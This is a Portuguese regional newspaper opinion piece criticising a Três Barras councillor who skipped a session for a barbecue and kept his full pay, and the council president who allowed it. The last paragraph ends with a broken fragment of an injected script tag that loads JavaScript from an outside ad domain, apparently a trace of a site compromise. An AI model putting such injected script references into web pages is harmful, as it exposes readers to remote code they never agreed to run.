InícioDestaqueE A VERGONHA CONTINUA...

E A VERGONHA CONTINUA…

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

Todos devem se lembrar do fatídico episódio do edil Adilson Martins, no qual o vereador aparece em fotos em um churrasco durante horário em que deveria estar na sessão. O fato ocorreu no último dia 20 de junho.

 

Hoje, ao consultar o portal transparência, constatei que o mesmo não teve desconto no seu subsídio referente ao dia que faltou para ir ao churrasco.

 

Será que alguém ainda tinha alguma dúvida que esse desconto não iria ocorrer?

 

Onde fica a ética, a moral, os bons costumes uma hora dessas?

 

No meu posto de vista, o nobre vereador deveria se acusar e dizer que estava errado e descontar esse dia de sua remuneração. Isso é o que pede a honestidade política. Assumir o erro é uma atitude nobre e que lhe renderia pontos com os eleitores tresbarrenses.

 

Mas o que ele fez? Fingiu que não era com ele, achando que iria passar despercebido, nem ao menos uma explicação deu. Que vergonha!

 

Mais vergonhosa ainda é a atitude do presidente da casa, ora excelentíssimo presidente, cabia ao senhor impor o desconto ao seu colega faltante. Mais uma vez o senhor deixa a desejar como defensor dos recursos do público.

 

Senhores vereadores tresbarrenses, por favor, botem a mão na consciência e vejam o que vocês estão fazendo, ou melhor, deixando de fazer. Se vocês soubessem o poder que tem nas mãos, aliás, acho que sabem, mas preferem não utilizar. Afinal, dá muito trabalho ser bom vereador. Com uma ou duas exceções, os nobres edis em geral não pensam no desenvolvimento socioeconômico do município.

 

Uma das poucas exceções é o vereador Marco Antônio de Souza (Gorguinho), que apresentou indicação para a criação de Fundação Cultural, Turismo e de Esporte. Um projeto importante, que se se tornar realidade poderia ajudar a afastar crianças e adolescentes das drogas, mal que cada vez mais está presente em nossa região.

 

Voltando ao caso do vereador faltoso, infelizmente, não há nada que possamos fazer a não ser esperar que esse senhor resolva ser honrado, assumir o erro e devolver o dinheiro do público…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.